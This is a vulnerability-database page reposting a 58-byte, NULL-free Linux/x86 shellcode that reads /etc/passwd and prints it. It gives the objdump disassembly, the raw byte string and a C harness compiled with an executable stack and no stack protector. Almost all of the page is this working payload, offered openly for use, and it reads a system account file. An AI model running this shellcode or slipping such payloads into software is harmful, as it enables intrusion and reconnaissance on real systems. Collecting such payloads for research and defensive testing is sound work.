Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Linux/x86 Read /etc/passwd Shellcode 58 bytes

🗓️ 02 Feb 2019 00:00:00Reported by KiewiczType 
zdt
 zdt🔗 0day.today👁 29 Views

Linux/x86 Read /etc/passwd Shellcode 58 bytes NULL byte free

Code
/* 
# Shellcode Title: Linux/x86 - Read File (/etc/passwd) (58 bytes). NULL byte free
# Author: Kiewicz (@_Kiewicz)
# Homepage: https://0xkiewicz.github.io
# Tested on: Debian/x86
# gcc -o shellcode -z execstack -fno-stack-protector shellcode.c 
# PA-7854
*/


/******************************************************************
$ objdump -d -M intel read_file

read_file:     file format elf32-i386


Disassembly of section .text:

08048060 <_start>:
 8048060:  eb 28                  jmp    804808a <read_file>

08048062 <open>:
 8048062:  5b                     pop    ebx
 8048063:  31 c9                  xor    ecx,ecx
 8048065:  f7 e1                  mul    ecx
 8048067:  99                     cdq    
 8048068:  b0 05                  mov    al,0x5
 804806a:  cd 80                  int    0x80

0804806c <read>:
 804806c:  89 c3                  mov    ebx,eax
 804806e:  b0 03                  mov    al,0x3
 8048070:  89 e7                  mov    edi,esp
 8048072:  89 f9                  mov    ecx,edi
 8048074:  31 d2                  xor    edx,edx
 8048076:  b2 ff                  mov    dl,0xff
 8048078:  cd 80                  int    0x80

0804807a <write>:
 804807a:  89 c2                  mov    edx,eax
 804807c:  31 c0                  xor    eax,eax
 804807e:  b0 04                  mov    al,0x4
 8048080:  31 db                  xor    ebx,ebx
 8048082:  b3 01                  mov    bl,0x1
 8048084:  cd 80                  int    0x80

08048086 <exit>:
 8048086:  b0 01                  mov    al,0x1
 8048088:  cd 80                  int    0x80

0804808a <read_file>:
 804808a:  e8 d3 ff ff ff         call   8048062 <open>

0804808f <filetoread>:
 804808f:  2f                     das    
 8048090:  65 74 63               gs je  80480f6 <filetoread+0x67>
 8048093:  2f                     das    
 8048094:  70 61                  jo     80480f7 <filetoread+0x68>
 8048096:  73 73                  jae    804810b <filetoread+0x7c>
 8048098:  77 64                  ja     80480fe <filetoread+0x6f>
******************************************************************/

#include<stdio.h>
#include<string.h>

unsigned char code[] = "\xeb\x28\x5b\x31\xc9\xf7\xe1\x99\xb0\x05\xcd\x80\x89\xc3\xb0\x03\x89\xe7\x89\xf9\x31\xd2\xb2\xff\xcd\x80\x89\xc2\x31\xc0\xb0\x04\x31\xdb\xb3\x01\xcd\x80\xb0\x01\xcd\x80\xe8\xd3\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64";

int main()
{

  printf("Shellcode Length:  %d\n", strlen(code));

  int (*ret)() = (int(*)())code;

  ret();
  return 0;
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
02 Feb 2019 00:00Current
0.1Low risk
Vulners AI Score0.1
shellcodelinuxread file/etc/passwdx86null bytedebianvulnerability
29